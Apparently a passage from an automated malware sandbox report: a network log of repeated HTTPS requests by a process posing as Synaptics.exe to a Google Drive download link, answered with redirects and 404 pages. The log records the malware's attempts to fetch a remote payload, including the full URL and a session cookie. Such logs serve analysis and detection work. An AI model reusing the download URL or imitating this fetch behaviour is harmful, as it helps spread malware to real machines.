                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                60192.168.2.450037142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:40 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-a_0xIM_HucWZEpCyu1_mHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                61192.168.2.450055142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:43 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5LmfoLRsGgCGmFXEMtpHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                62192.168.2.450056142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:43 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-REUwgfU2stAOlyBDwr_eag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                63192.168.2.450075142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:47 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BKzO9ne4KvcowyTQbeZFyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                64192.168.2.450076142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:47 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_thgLo3_GE2AIVhtQayU1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                65192.168.2.450085142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:49 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mKejcf9Sx9gGuYzWQ50kXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                66192.168.2.450084142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:50 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5yLLd63mTyymk8cynW1LXLsb9yDn2Dc5Nfeln7d87xFpjosoPUVcws31na8XjG1abv
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EvRgHQ2sVqNNQgM9jmFWhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:50 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:50 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 79 6d 44 34 43 6b 4d 36 6d 67 57 5f 71 42 52 50 73 51 6c 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="LymD4CkM6mgW_qBRPsQlAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:50 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                67192.168.2.450087142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:49 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-7No2Pp5xV6GvvHl1mJ6E8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                68192.168.2.450086142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:51 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC41UYyn26Lm1ZDVFJp-pOcvAy7sTxN0DW3XWyJQWVFCXduairEXYKECj7j5Rcl2atpCbozCrr0
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gYiaHXXfDRklIN--AgVPYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
